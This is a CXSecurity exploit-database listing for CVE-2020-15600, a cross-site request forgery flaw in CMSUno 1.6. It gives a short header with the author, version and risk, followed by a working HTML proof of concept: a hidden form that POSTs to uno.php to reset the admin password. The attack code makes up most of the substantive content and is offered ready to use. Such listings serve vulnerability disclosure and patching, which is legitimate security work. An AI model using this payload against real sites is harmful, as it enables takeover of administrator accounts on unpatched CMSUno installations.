CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password) – CXSecurity.com




CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password)

2023.09.15

Risk:
Medium

Remote: Yes

# Exploit Title: CMSUno 1.6 – Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-07-22
# Exploit Author: Gh05t666include (AnonGhost Indonesia)
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600
An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.
PoC :
<html>
<body>
<script>history.pushState(“,”,’/’)</script>
<form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”>
<input type=“hidden” name=“user” value=“admin”/>
<input type=“hidden” name=“pass” value=“yourpassword”/>
<input type=“submit” name=“user” value=“Submit request”/>
</form>
</body>
</html>

References:

https://github.com/boiteasite/cmsuno



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1


{{ x.comment }}


Copyright 2023, cxsecurity.com

 

Back to Top